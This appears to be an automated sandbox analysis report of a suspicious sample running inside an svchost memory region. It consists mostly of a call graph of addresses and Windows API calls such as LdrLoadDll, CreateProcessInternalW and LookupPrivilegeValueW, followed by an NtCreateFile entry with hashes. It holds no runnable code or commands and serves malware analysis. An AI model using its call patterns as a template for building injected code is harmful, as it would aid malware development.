LdrInitializeThunk 31825->31844 31826 2a29ef3 31826->31558 31828->31627 31830 2a2cf40 31829->31830 31831 2a2cf46 31829->31831 31830->31777 31832 2a2bf90 2 API calls 31831->31832 31833 2a2cf6c 31832->31833 31833->31777 31835 2a24334 31834->31835 31836 2a2bdc0 2 API calls 31834->31836 31835->31796 31836->31835 31837->31783 31839 2a2cfd0 31838->31839 31840 2a2d02d 31839->31840 31841 2a2bf90 2 API calls 31839->31841 31840->31783 31842 2a2d00a 31841->31842 31843 2a2bdc0 2 API calls 31842->31843 31843->31840 31844->31826 31846 3469681 31845->31846 31847 346968f LdrInitializeThunk 31845->31847 31846->31636 31847->31636 31849 2a2af60 LdrLoadDll 31848->31849 31850 2a2a68c RtlFreeHeap 31849->31850 31850->31640 31852 2a17eb0 31851->31852 31853 2a17eab 31851->31853 31854 2a2bd40 2 API calls 31852->31854 31853->31566 31861 2a17ed5 31854->31861 31855 2a17f38 31855->31566 31856 2a29ec0 2 API calls 31856->31861 31857 2a17f3e 31858 2a17f64 31857->31858 31860 2a2a5c0 2 API calls 31857->31860 31858->31566 31862 2a17f55 31860->31862 31861->31855 31861->31856 31861->31857 31863 2a2bd40 2 API calls 31861->31863 31867 2a2a5c0 31861->31867 31862->31566 31863->31861 31865 2a2a5c0 2 API calls 31864->31865 31866 2a1817e 31865->31866 31866->31527 31868 2a2af60 LdrLoadDll 31867->31868 31869 2a2a5dc 31868->31869 31872 34696e0 LdrInitializeThunk 31869->31872 31870 2a2a5f3 31870->31861 31872->31870 31874 2a2b5c3 31873->31874 31875 2a1acf0 LdrLoadDll 31874->31875 31876 2a19c5b 31875->31876 31876->31535 31878 2a1b063 31877->31878 31880 2a1b0e0 31878->31880 31892 2a29c90 LdrLoadDll 31878->31892 31880->31540 31882 2a2af60 LdrLoadDll 31881->31882 31883 2a1f1bb 31882->31883 31883->31548 31884 2a2a7d0 31883->31884 31885 2a2a7ef LookupPrivilegeValueW 31884->31885 31886 2a2af60 LdrLoadDll 31884->31886 31885->31544 31886->31885 31888 2a2af60 LdrLoadDll 31887->31888 31889 2a2a27c 31888->31889 31893 3469910 LdrInitializeThunk 31889->31893 31890 2a2a29b 31890->31547 31892->31880 31893->31890 31895 2a1b1f0 31894->31895 31896 2a1b040 LdrLoadDll 31895->31896 31897 2a1b204 31896->31897 31897->31480 31899 2a1af34 31898->31899 31994 2a29c90 LdrLoadDll 31899->31994 31901 2a1af6e 31901->31482 31903 2a1f3ac 31902->31903 31904 2a1b1c0 LdrLoadDll 31903->31904 31905 2a1f3be 31904->31905 31995 2a1f290 31905->31995 31908 2a1f3d9 31909 2a2a490 2 API calls 31908->31909 31911 2a1f3e4 31908->31911 31909->31911 31910 2a1f3f1 31912 2a2a490 2 API calls 31910->31912 31913 2a1f402 31910->31913 31911->31486 31912->31913 31913->31486 31915 2a1f43c 31914->31915 32014 2a1b2b0 31915->32014 31917 2a1f44e 31918 2a1f290 3 API calls 31917->31918 31919 2a1f45f 31918->31919 31920 2a1f481 31919->31920 31921 2a1f469 31919->31921 31922 2a1f492 31920->31922 31925 2a2a490 2 API calls 31920->31925 31923 2a1f474 31921->31923 31924 2a2a490 2 API calls 31921->31924 31922->31488 31923->31488 31924->31923 31925->31922 31927 2a1caa6 31926->31927 31928 2a1cab0 31926->31928 31927->31497 31929 2a1af10 LdrLoadDll 31928->31929 31930 2a1cb4e 31929->31930 31931 2a1cb74 31930->31931 31932 2a1b040 LdrLoadDll 31930->31932 31931->31497 31933 2a1cb90 31932->31933 31934 2a24a50 10 API calls 31933->31934 31935 2a1cbe5 31934->31935 31935->31497 31937 2a1d6e5 31936->31937 31938 2a1d797 31937->31938 31939 2a1d6f7 31937->31939 31941 2a1b040 LdrLoadDll 31938->31941 31940 2a1b040 LdrLoadDll 31939->31940 31942 2a1d706 31940->31942 31943 2a1d7a6 31941->31943 31944 2a1b040 LdrLoadDll 31942->31944 31947 2a1d7e4 31942->31947 32035 2a1cf20 31943->32035 31945 2a1d72b 31944->31945 31948 2a1b040 LdrLoadDll 31945->31948 31947->31508 31949 2a1d749 31948->31949 32018 2a1d150 31949->32018 31951 2a1d75c 31952 2a1b040 LdrLoadDll 31951->31952 31955 2a1d767 31951->31955 31953 2a1d7f4 31952->31953 32046 2a1cfe0 31953->32046 31955->31508 31957 2a1d89d 31959 2a1d150 4 API calls 31957->31959 31958 2a2a490 2 API calls 31960 2a1d81f 31958->31960 31961 2a1d8b3 31959->31961 31964 2a1b040 LdrLoadDll 31960->31964 31966 2a1d8ba 31961->31966 32050 2a1d3d0 31961->32050 31963 2a1d8f7 31963->31508 31965 2a1d843 31964->31965 31967 2a1cfe0 2 API calls 31965->31967 31966->31508 31968 2a1d859 31967->31968 31969 2a2a490 2 API calls 31968->31969 31970 2a1d863 31969->31970 31971 2a1b040 LdrLoadDll 31970->31971 31972 2a1d887 31971->31972 31973 2a1cfe0 2 API calls 31972->31973 31973->31957 31977 2a18d14 31974->31977 32122 2a1f6d0 31974->32122 31976 2a18f25 31976->31484 31977->31976 32127 2a243a0 31977->32127 31979 2a18d70 31979->31976 32130 2a18ab0 31979->32130 31982 2a2cf30 2 API calls 31983 2a18db2 31982->31983 31984 2a2d060 3 API calls 31983->31984 31989 2a18dc7 31984->31989 31985 2a17ea0 4 API calls 31985->31989 31988 2a1c7b0 22 API calls 31988->31989 31989->31976 31989->31985 31989->31988 31990 2a18160 2 API calls 31989->31990 32135 2a1f670 31989->32135 32139 2a1f080 31989->32139 31990->31989 31991->31489 31992->31506 31993->31510 31994->31901 31996 2a1f2aa 31995->31996 32004 2a1f360 31995->32004 31997 2a1b040 LdrLoadDll 31996->31997 31998 2a1f2cc 31997->31998 32005 2a29f40 31998->32005 32000 2a1f30e 32008 2a29f80 32000->32008 32003 2a2a490 2 API calls 32003->32004 32004->31908 32004->31910 32006 2a29f5c 32005->32006 32007 2a2af60 LdrLoadDll 32005->32007 32006->32000 32007->32006 32009 2a2af60 LdrLoadDll 32008->32009 32010 2a29f9c 32009->32010 32013 3469fe0 LdrInitializeThunk 32010->32013 32011 2a1f354 32011->32003 32013->32011 32015 2a1b2d7 32014->32015 32016 2a1b040 LdrLoadDll 32015->32016 32017 2a1b313 32016->32017 32017->31917 32019 2a1d17c 32018->32019 32020 2a1cfe0 2 API calls 32019->32020 32021 2a1d1c6 32020->32021 32022 2a1d268 32021->32022 32091 2a2a1a0 32021->32091 32022->31951 32024 2a1d25f 32025 2a2a490 2 API calls 32024->32025 32025->32022 32026 2a1d1ed 32026->32024 32027 2a1d274 32026->32027 32028 2a2a1a0 2 API calls 32026->32028 32029 2a2a490 2 API calls 32027->32029 32028->32026 32030 2a1d27d 32029->32030 32031 2a1d2ec 32030->32031 32032 2a1cfe0 2 API calls 32030->32032 32031->31951 32033 2a1d296 32032->32033 32033->32031 32034 2a24e50 LdrLoadDll 32033->32034 32034->32031 32036 2a1cf4c 32035->32036 32037 2a2a1e0 LdrLoadDll 32036->32037 32038 2a1cf65 32037->32038 32039 2a1cf6c 32038->32039 32097 2a2a220 32038->32097 32039->31942 32043 2a1cfa7 32044 2a2a490 2 API calls 32043->32044 32045 2a1cfca 32044->32045 32045->31942 32047 2a1d005 32046->32047 32106 2a2a090 32047->32106 32051 2a1d3f5 32050->32051 32052 2a1d403 32051->32052 32053 2a1d417 32051->32053 32055 2a1b040 LdrLoadDll 32052->32055 32054 2a1b040 LdrLoadDll 32053->32054 32056 2a1d426 32054->32056 32057 2a1d412 32055->32057 32059 2a1cf20 3 API calls 32056->32059 32058 2a1b040 LdrLoadDll 32057->32058 32060 2a1d614 32057->32060 32061 2a1d486 32058->32061 32059->32057 32060->31963 32062 2a1b040 LdrLoadDll 32061->32062 32063 2a1d4b7 32062->32063 32064 2a1d5b0 32063->32064 32066 2a1cfe0 2 API calls 32063->32066 32065 2a1cfe0 2 API calls 32064->32065 32067 2a1d5c9 32065->32067 32068 2a1d4da 32066->32068 32112 2a1d090 32067->32112 32070 2a1d4e5 32068->32070 32071 2a1d58f 32068->32071 32072 2a2a490 2 API calls 32070->32072 32075 2a1b040 LdrLoadDll 32071->32075 32073 2a1d4ef 32072->32073 32077 2a1b040 LdrLoadDll 32073->32077 32074 2a2a490 2 API calls 32074->32060 32075->32064 32076 2a1d5d9 32076->32074 32078 2a1d513 32077->32078 32079 2a1cfe0 2 API calls 32078->32079 32080 2a1d529 32079->32080 32081 2a2a490 2 API calls 32080->32081 32082 2a1d533 32081->32082 32083 2a1b040 LdrLoadDll 32082->32083 32084 2a1d557 32083->32084 32085 2a1cfe0 2 API calls 32084->32085 32086 2a1d56d 32085->32086 32087 2a1d090 2 API calls 32086->32087 32088 2a1d57d 32087->32088 32089 2a2a490 2 API calls 32088->32089 32090 2a1d587 32089->32090 32090->31963 32092 2a2af60 LdrLoadDll 32091->32092 32093 2a2a1bc 32092->32093 32096 3469610 LdrInitializeThunk 32093->32096 32094 2a2a1db 32094->32026 32096->32094 32098 2a2af60 LdrLoadDll 32097->32098 32099 2a2a23c 32098->32099 32105 3469710 LdrInitializeThunk 32099->32105 32100 2a1cf8f 32100->32039 32102 2a2a810 32100->32102 32103 2a2a82f 32102->32103 32104 2a2af60 LdrLoadDll 32102->32104 32103->32043 32104->32103 32105->32100 32107 2a2af60 LdrLoadDll 32106->32107 32108 2a2a0ac 32107->32108 32111 34696d0 LdrInitializeThunk 32108->32111 32109 2a1d079 32109->31957 32109->31958 32111->32109 32113 2a1d0b4 32112->32113 32116 2a2a0e0 32113->32116 32117 2a2af60 LdrLoadDll 32116->32117 32118 2a2a0fc 32117->32118 32121 3469b00 LdrInitializeThunk 32118->32121 32119 2a1d13b 32119->32076 32121->32119 32123 2a1f6ef 32122->32123 32124 2a24e50 LdrLoadDll 32122->32124 32125 2a1f6f6 SetErrorMode 32123->32125 32126 2a1f6fd 32123->32126 32124->32123 32125->32126 32126->31977 32167 2a1f4a0 32127->32167 32129 2a243c6 32129->31979 32131 2a2bd40 2 API calls 32130->32131 32134 2a18ad5 32131->32134 32132 2a18cea 32132->31982 32134->32132 32186 2a29880 32134->32186 32136 2a1f683 32135->32136 32214 2a29e90 32136->32214 32140 2a1f090 32139->32140 32141 2a1f0de 32139->32141 32140->32141 32251 2a1d910 13 API calls 32140->32251 32143 2a1f15e 32141->32143 32220 2a1dfc0 32141->32220 32270 2a141d0 26 API calls 32143->32270 32144 2a1f0f0 32146 2a1f101 32144->32146 32267 2a1ec60 10 API calls 32144->32267 32151 2a1f124 32146->32151 32154 2a1f11b 32146->32154 32268 2a1edc0 10 API calls 32146->32268 32147 2a1f0b6 32152 2a24a50 10 API calls 32147->32152 32149 2a1f16d 32149->31989 32225 2a1eed0 32151->32225 32155 2a1f0c7 32152->32155 32269 2a1ef40 11 API calls 32154->32269 32156 2a24a50 10 API calls 32155->32156 32160 2a1f0d8 32156->32160 32252 2a1efa0 32160->32252 32166 2a24a50 10 API calls 32166->32143 32168 2a1f4bd 32167->32168 32174 2a29fc0 32168->32174 32171 2a1f505 32171->32129 32175 2a29fdc 32174->32175 32176 2a2af60 LdrLoadDll 32174->32176 32184 34699a0 LdrInitializeThunk 32175->32184 32176->32175 32177 2a1f4fe 32177->32171 32179 2a2a010 32177->32179 32180 2a2af60 LdrLoadDll 32179->32180 32181 2a2a02c 32180->32181 32185 3469780 LdrInitializeThunk 32181->32185 32182 2a1f52e 32182->32129 32184->32177 32185->32182 32187 2a2bf90 2 API calls 32186->32187 32188 2a29897 32187->32188 32207 2a19310 32188->32207 32190 2a298b2 32191 2a298f0 32190->32191 32192 2a298d9 32190->32192 32195 2a2bd40 2 API calls 32191->32195 32193 2a2bdc0 2 API calls 32192->32193 32194 2a298e6 32193->32194 32194->32132 32196 2a2992a 32195->32196 32197 2a2bd40 2 API calls 32196->32197 32198 2a29943 32197->32198 32204 2a29be4 32198->32204 32213 2a2bd80 LdrLoadDll 32198->32213 32200 2a29bc9 32201 2a29bd0 32200->32201 32200->32204 32202 2a2bdc0 2 API calls 32201->32202 32203 2a29bda 32202->32203 32203->32132 32205 2a2bdc0 2 API calls 32204->32205 32206 2a29c39 32205->32206 32206->32132 32208 2a19335 32207->32208 32209 2a1acf0 LdrLoadDll 32208->32209 32210 2a19368 32209->32210 32211 2a1cf20 3 API calls 32210->32211 32212 2a1938d 32210->32212 32211->32212 32212->32190 32213->32200 32215 2a29eac 32214->32215 32216 2a2af60 LdrLoadDll 32214->32216 32219 3469840 LdrInitializeThunk 32215->32219 32216->32215 32217 2a1f6ae 32217->31989 32219->32217 32222 2a1dfd8 32220->32222 32224 2a1e098 32220->32224 32221 2a1e031 32221->32144 32222->32221 32223 2a24a50 10 API calls 32222->32223 32223->32224 32224->32144 32226 2a1eee8 32225->32226 32230 2a1ef37 32225->32230 32226->32230 32271 2a1faa0 32226->32271 32228 2a1ef23 32228->32230 32283 2a1fcf0 13 API calls 32228->32283 32231 2a1ee00 32230->32231 32232 2a1eeb8 32231->32232 32233 2a1ee1e 32231->32233 32232->32149 32235 2a1eaa0 32232->32235 32233->32232 32234 2a24a50 10 API calls 32233->32234 32234->32232 32236 2a1eabc 32235->32236 32250 2a1eb9b 32235->32250 32238 2a2a490 2 API calls 32236->32238 32236->32250 32237 2a1ec31 32239 2a1ec4e 32237->32239 32240 2a24a50 10 API calls 32237->32240 32241 2a1ead7 32238->32241 32239->32143 32239->32166 32240->32239 32244 2a1d150 4 API calls 32241->32244 32242 2a1d150 4 API calls 32243 2a1ec0b 32242->32243 32243->32237 32246 2a1d3d0 5 API calls 32243->32246 32245 2a1eb0f 32244->32245 32247 2a1b040 LdrLoadDll 32245->32247 32246->32237 32248 2a1eb20 32247->32248 32249 2a1b040 LdrLoadDll 32248->32249 32249->32250 32250->32237 32250->32242 32251->32147 32284 2a23d70 32252->32284 32254 2a1efad 32322 2a22a50 32254->32322 32256 2a1efb3 32358 2a20e60 32256->32358 32258 2a1efb9 32381 2a21bd0 32258->32381 32260 2a1efc1 32415 2a22d70 32260->32415 32262 2a1efc7 32418 2a233e0 32262->32418 32267->32146 32268->32154 32269->32151 32270->32149 32272 2a1fac5 32271->32272 32273 2a1b040 LdrLoadDll 32272->32273 32274 2a1fb80 32273->32274 32275 2a1b040 LdrLoadDll 32274->32275 32276 2a1fba4 32275->32276 32277 2a24a50 10 API calls 32276->32277 32279 2a1fbf7 32277->32279 32278 2a1fcb1 32278->32228 32279->32278 32280 2a1b040 LdrLoadDll 32279->32280 32281 2a1fc5e 32280->32281 32282 2a24a50 10 API calls 32281->32282 32282->32278 32283->32230 32285 2a23d98 32284->32285 32286 2a1b040 LdrLoadDll 32285->32286 32287 2a23dc7 32286->32287 32288 2a1cf20 3 API calls 32287->32288 32290 2a23dfa 32288->32290 32289 2a23e01 32289->32254 32290->32289 32291 2a1b040 LdrLoadDll 32290->32291 32292 2a23e29 32291->32292 32293 2a1b040 LdrLoadDll 32292->32293 32294 2a23e4d 32293->32294 32295 2a1cfe0 2 API calls 32294->32295 32296 2a23e71 32295->32296 32297 2a23eb3 32296->32297 32450 2a236c0 32296->32450 32301 2a1b040 LdrLoadDll 32297->32301 32299 2a23e8a 32300 2a24036 32299->32300 32457 2a23ab0 12 API calls 32299->32457 32300->32254 32303 2a23ed3 32301->32303 32304 2a1cfe0 2 API calls 32303->32304 32305 2a23ef7 32304->32305 32306 2a23f3d 32305->32306 32307 2a23f14 32305->32307 32309 2a236c0 10 API calls 32305->32309 32308 2a1cfe0 2 API calls 32306->32308 32307->32300 32458 2a23ab0 12 API calls 32307->32458 32311 2a23f6d 32308->32311 32309->32307 32312 2a23fb3 32311->32312 32313 2a23f8a 32311->32313 32314 2a236c0 10 API calls 32311->32314 32316 2a1cfe0 2 API calls 32312->32316 32313->32300 32459 2a23ab0 12 API calls 32313->32459 32314->32313 32317 2a24012 32316->32317 32318 2a2405b 32317->32318 32319 2a2402f 32317->32319 32321 2a236c0 10 API calls 32317->32321 32318->32254 32319->32300 32460 2a23ab0 12 API calls 32319->32460 32321->32319 32323 2a22ab4 32322->32323 32324 2a1b040 LdrLoadDll 32323->32324 32325 2a22b81 32324->32325 32326 2a1cf20 3 API calls 32325->32326 32328 2a22bb4 32326->32328 32327 2a22bbb 32327->32256 32328->32327 32329 2a1b040 LdrLoadDll 32328->32329 32330 2a22be3 32329->32330 32331 2a1cfe0 2 API calls 32330->32331 32332 2a22c23 32331->32332 32333 2a236c0 10 API calls 32332->32333 32356 2a22d43 32332->32356 32334 2a22c40 32333->32334 32335 2a22d52 32334->32335 32461 2a22870 32334->32461 32336 2a2a490 2 API calls 32335->32336 32338 2a22d5c 32336->32338 32338->32256 32339 2a22c58 32339->32335 32340 2a22c63 32339->32340 32341 2a2bf90 2 API calls 32340->32341 32342 2a22c8c 32341->32342 32343 2a22c95 32342->32343 32344 2a22cab 32342->32344 32345 2a2a490 2 API calls 32343->32345 32490 2a22760 CoInitialize 32344->32490 32347 2a22c9f 32345->32347 32347->32256 32348 2a22cb9 32349 2a2a1a0 2 API calls 32348->32349 32355 2a22cd7 32349->32355 32350 2a22d32 32351 2a2a490 2 API calls 32350->32351 32352 2a22d3c 32351->32352 32354 2a2bdc0 2 API calls 32352->32354 32354->32356 32355->32350 32357 2a2a1a0 2 API calls 32355->32357 32492 2a22690 10 API calls 32355->32492 32356->32256 32357->32355 32359 2a20e88 32358->32359 32360 2a2bf90 2 API calls 32359->32360 32362 2a20ee8 32360->32362 32361 2a20ef1 32361->32258 32362->32361 32493 2a20b30 32362->32493 32364 2a20f18 32365 2a20f36 32364->32365 32528 2a217c0 11 API calls 32364->32528 32370 2a20f50 32365->32370 32530 2a1ae40 LdrLoadDll 32365->32530 32367 2a20f2a 32529 2a217c0 11 API calls 32367->32529 32371 2a20b30 12 API calls 32370->32371 32372 2a20f7b 32371->32372 32373 2a20f9a 32372->32373 32531 2a217c0 11 API calls 32372->32531 32375 2a20fb4 32373->32375 32533 2a1ae40 LdrLoadDll 32373->32533 32378 2a2bdc0 2 API calls 32375->32378 32376 2a20f8e 32532 2a217c0 11 API calls 32376->32532 32380 2a20fbe 32378->32380 32380->32258 32382 2a21bf6 32381->32382 32383 2a21c08 32382->32383 32384 2a21c8e 32382->32384 32386 2a1b040 LdrLoadDll 32383->32386 32385 2a21c6c 32384->32385 32543 2a22d90 32384->32543 32392 2a21c86 32385->32392 32548 2a288d0 32385->32548 32389 2a21c19 32386->32389 32390 2a21c37 32389->32390 32393 2a1b040 LdrLoadDll 32389->32393 32396 2a1b040 LdrLoadDll 32390->32396 32391 2a21ccb 32394 2a21d20 32391->32394 32574 2a21380 32391->32574 32392->32260 32393->32390 32394->32260 32398 2a21c5b 32396->32398 32397 2a21ce3 32399 2a21cea 32397->32399 32400 2a21d2c 32397->32400 32402 2a24a50 10 API calls 32398->32402 32403 2a21cf2 32399->32403 32404 2a21d0f 32399->32404 32401 2a1b040 LdrLoadDll 32400->32401 32405 2a21d3d 32401->32405 32402->32385 32406 2a2bdc0 2 API calls 32403->32406 32407 2a2bdc0 2 API calls 32404->32407 32585 2a20fe0 32405->32585 32408 2a21d03 32406->32408 32407->32394 32408->32260 32410 2a21e3f 32411 2a2bdc0 2 API calls 32410->32411 32412 2a21e46 32411->32412 32412->32260 32413 2a21d57 32413->32410 32591 2a216f0 10 API calls 32413->32591 32416 2a21bd0 11 API calls 32415->32416 32417 2a22d81 32416->32417 32417->32262 32419 2a233e9 32418->32419 32420 2a1acf0 LdrLoadDll 32419->32420 32421 2a23418 32420->32421 32422 2a24e50 LdrLoadDll 32421->32422 32441 2a1efd3 32421->32441 32423 2a23442 32422->32423 32424 2a24e50 LdrLoadDll 32423->32424 32425 2a23455 32424->32425 32426 2a24e50 LdrLoadDll 32425->32426 32427 2a23468 32426->32427 32428 2a24e50 LdrLoadDll 32427->32428 32429 2a2347b 32428->32429 32430 2a24e50 LdrLoadDll 32429->32430 32431 2a23491 32430->32431 32432 2a24e50 LdrLoadDll 32431->32432 32433 2a234a4 32432->32433 32434 2a24e50 LdrLoadDll 32433->32434 32435 2a234b7 32434->32435 32436 2a24e50 LdrLoadDll 32435->32436 32437 2a234ca 32436->32437 32438 2a24e50 LdrLoadDll 32437->32438 32439 2a234df 32438->32439 32440 2a236c0 10 API calls 32439->32440 32439->32441 32443 2a23561 32440->32443 32444 2a260e0 32441->32444 32443->32441 32620 2a22fa0 32443->32620 32445 2a26138 32444->32445 32449 2a1efdf 32445->32449 32625 2a25d40 32445->32625 32447 2a261a3 32447->32449 32663 2a25ff0 32447->32663 32449->32141 32452 2a23735 32450->32452 32451 2a238c2 32451->32299 32452->32451 32453 2a24a50 10 API calls 32452->32453 32454 2a238a2 32453->32454 32454->32451 32455 2a24a50 10 API calls 32454->32455 32456 2a238b3 32455->32456 32456->32299 32457->32297 32458->32306 32459->32312 32460->32318 32462 2a2288c 32461->32462 32463 2a1acf0 LdrLoadDll 32462->32463 32464 2a228a7 32463->32464 32465 2a228b0 32464->32465 32466 2a24e50 LdrLoadDll 32464->32466 32465->32339 32467 2a228c7 32466->32467 32468 2a24e50 LdrLoadDll 32467->32468 32469 2a228dc 32468->32469 32470 2a24e50 LdrLoadDll 32469->32470 32471 2a228ef 32470->32471 32472 2a24e50 LdrLoadDll 32471->32472 32473 2a22902 32472->32473 32474 2a24e50 LdrLoadDll 32473->32474 32475 2a22918 32474->32475 32476 2a24e50 LdrLoadDll 32475->32476 32477 2a2292b 32476->32477 32478 2a1acf0 LdrLoadDll 32477->32478 32479 2a22954 32478->32479 32480 2a24e50 LdrLoadDll 32479->32480 32489 2a229f0 32479->32489 32481 2a22978 32480->32481 32482 2a1acf0 LdrLoadDll 32481->32482 32483 2a229ad 32482->32483 32484 2a24e50 LdrLoadDll 32483->32484 32483->32489 32485 2a229ca 32484->32485 32486 2a24e50 LdrLoadDll 32485->32486 32487 2a229dd 32486->32487 32488 2a24e50 LdrLoadDll 32487->32488 32488->32489 32489->32339 32491 2a227c5 32490->32491 32491->32348 32492->32355 32494 2a20bc8 32493->32494 32495 2a1b040 LdrLoadDll 32494->32495 32496 2a20c66 32495->32496 32497 2a1b040 LdrLoadDll 32496->32497 32498 2a20c81 32497->32498 32499 2a1cfe0 2 API calls 32498->32499 32500 2a20ca6 32499->32500 32501 2a20e11 32500->32501 32534 2a2a120 32500->32534 32502 2a20e22 32501->32502 32504 2a1faa0 10 API calls 32501->32504 32502->32364 32504->32502 32506 2a20e07 32507 2a2a490 2 API calls 32506->32507 32507->32501 32508 2a20cdc 32509 2a2a490 2 API calls 32508->32509 32510 2a20d1f 32509->32510 32539 2a2c060 LdrLoadDll 32510->32539 32512 2a20d58 32513 2a20d5f 32512->32513 32514 2a1cfe0 2 API calls 32512->32514 32513->32364 32515 2a20d76 32514->32515 32515->32502 32516 2a2a120 2 API calls 32515->32516 32517 2a20d9b 32516->32517 32518 2a20da2 32517->32518 32519 2a20dee 32517->32519 32520 2a2a490 2 API calls 32518->32520 32521 2a2a490 2 API calls 32519->32521 32522 2a20dac 32520->32522 32523 2a20df8 32521->32523 32540 2a200c0 LdrLoadDll 32522->32540 32523->32364 32525 2a20dc9 32525->32502 32541 2a20890 10 API calls 32525->32541 32527 2a20ddf 32527->32364 32528->32367 32529->32365 32530->32370 32531->32376 32532->32373 32533->32375 32535 2a2af60 LdrLoadDll 32534->32535 32536 2a2a13c 32535->32536 32542 3469650 LdrInitializeThunk 32536->32542 32537 2a20cd1 32537->32506 32537->32508 32539->32512 32540->32525 32541->32527 32542->32537 32544 2a1b040 LdrLoadDll 32543->32544 32545 2a22dac 32543->32545 32544->32545 32546 2a24a50 10 API calls 32545->32546 32547 2a22e65 32545->32547 32546->32547 32547->32385 32549 2a288de 32548->32549 32550 2a288e5 32548->32550 32549->32391 32551 2a1acf0 LdrLoadDll 32550->32551 32552 2a28910 32551->32552 32553 2a28a64 32552->32553 32554 2a2bf90 2 API calls 32552->32554 32553->32391 32555 2a28928 32554->32555 32555->32553 32592 2a21180 LdrLoadDll 32555->32592 32557 2a28946 32558 2a24e50 LdrLoadDll 32557->32558 32559 2a2895c 32558->32559 32560 2a24e50 LdrLoadDll 32559->32560 32561 2a28978 32560->32561 32562 2a24e50 LdrLoadDll 32561->32562 32563 2a28994 32562->32563 32564 2a24e50 LdrLoadDll 32563->32564 32565 2a289b3 32564->32565 32566 2a24e50 LdrLoadDll 32565->32566 32567 2a289cf 32566->32567 32568 2a24e50 LdrLoadDll 32567->32568 32569 2a289eb 32568->32569 32570 2a24e50 LdrLoadDll 32569->32570 32571 2a28a11 32570->32571 32572 2a2bdc0 2 API calls 32571->32572 32573 2a28a54 32571->32573 32572->32553 32573->32391 32576 2a213a4 32574->32576 32575 2a215c0 32575->32397 32576->32575 32578 2a214d2 32576->32578 32580 2a21578 32576->32580 32577 2a215b1 32577->32397 32579 2a24a50 10 API calls 32578->32579 32582 2a214e2 32579->32582 32580->32577 32581 2a24a50 10 API calls 32580->32581 32581->32577 32582->32575 32583 2a24a50 10 API calls 32582->32583 32584 2a21569 32583->32584 32584->32397 32586 2a21006 32585->32586 32587 2a1b040 LdrLoadDll 32586->32587 32588 2a2103c 32587->32588 32593 2a1d310 32588->32593 32590 2a210ff 32590->32413 32591->32413 32592->32557 32594 2a1d327 32593->32594 32602 2a1f710 32594->32602 32598 2a1d39b 32599 2a1d3a2 32598->32599 32612 2a2a2a0 LdrLoadDll 32598->32612 32599->32590 32601 2a1d3b5 32601->32590 32603 2a1f735 32602->32603 32613 2a181a0 32603->32613 32605 2a1d36f 32609 2a2a6e0 32605->32609 32606 2a24a50 10 API calls 32607 2a1f759 32606->32607 32607->32605 32607->32606 32608 2a2bdc0 2 API calls 32607->32608 32608->32607 32610 2a2af60 LdrLoadDll 32609->32610 32611 2a2a6ff CreateProcessInternalW 32610->32611 32611->32598 32612->32601 32614 2a1829f 32613->32614 32615 2a181b5 32613->32615 32614->32607 32615->32614 32616 2a24a50 10 API calls 32615->32616 32618 2a18222 32616->32618 32617 2a18249 32617->32607 32618->32617 32619 2a2bdc0 LdrLoadDll RtlFreeHeap 32618->32619 32619->32617 32621 2a233ce 32620->32621 32624 2a23058 32620->32624 32621->32443 32622 2a22e80 LdrLoadDll 32622->32624 32623 2a24a50 10 API calls 32623->32624 32624->32621 32624->32622 32624->32623 32626 2a25d7f 32625->32626 32627 2a25d56 32625->32627 32630 2a25db3 32626->32630 32636 2a1acf0 LdrLoadDll 32626->32636 32631 2a1acf0 LdrLoadDll 32627->32631 32628 2a24e50 LdrLoadDll 32629 2a25e09 32628->32629 32632 2a24e50 LdrLoadDll 32629->32632 32634 2a25e2b 32629->32634 32638 2a1acf0 LdrLoadDll 32630->32638 32641 2a25de8 32630->32641 32631->32626 32632->32634 32633 2a25e4d 32635 2a25e6e 32633->32635 32639 2a24e50 LdrLoadDll 32633->32639 32634->32633 32637 2a24e50 LdrLoadDll 32634->32637 32640 2a25e90 32635->32640 32642 2a24e50 LdrLoadDll 32635->32642 32636->32630 32637->32633 32638->32641 32639->32635 32643 2a25eb2 32640->32643 32644 2a24e50 LdrLoadDll 32640->32644 32641->32628 32641->32629 32642->32640 32645 2a25ed3 32643->32645 32647 2a24e50 LdrLoadDll 32643->32647 32644->32643 32646 2a25ef5 32645->32646 32648 2a24e50 LdrLoadDll 32645->32648 32649 2a25f17 32646->32649 32650 2a24e50 LdrLoadDll 32646->32650 32647->32645 32648->32646 32651 2a25f39 32649->32651 32652 2a24e50 LdrLoadDll 32649->32652 32650->32649 32653 2a25f5b 32651->32653 32655 2a24e50 LdrLoadDll 32651->32655 32652->32651 32654 2a25f7d 32653->32654 32656 2a24e50 LdrLoadDll 32653->32656 32657 2a25f9f 32654->32657 32658 2a24e50 LdrLoadDll 32654->32658 32655->32653 32656->32654 32659 2a25fc1 32657->32659 32660 2a24e50 LdrLoadDll 32657->32660 32658->32657 32661 2a25fe3 32659->32661 32662 2a24e50 LdrLoadDll 32659->32662 32660->32659 32661->32447 32662->32661 32664 2a260c9 32663->32664 32665 2a26013 32663->32665 32664->32449 32665->32664 32666 2a2bf90 2 API calls 32665->32666 32669 2a2603a 32666->32669 32667 2a2607c 32668 2a2bdc0 2 API calls 32667->32668 32670 2a26086 32668->32670 32669->32664 32669->32667 32671 2a26092 32669->32671 32670->32449 32672 2a260bd 32671->32672 32673 2a2bdc0 2 API calls 32671->32673 32672->32449 32673->32672

                                                            Executed Functions

                                                            Function 02A2A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02A24BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A24BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A2A3AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: .z`
                                                            • API String ID: 823142352-1441809116
                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                            • Instruction ID: 869f0985619d9eddfb2e06dc561d24b94f55ecf97f7ff535490c4ab1cb8c1cda
                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                            • Instruction Fuzzy Hash: 5CF0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

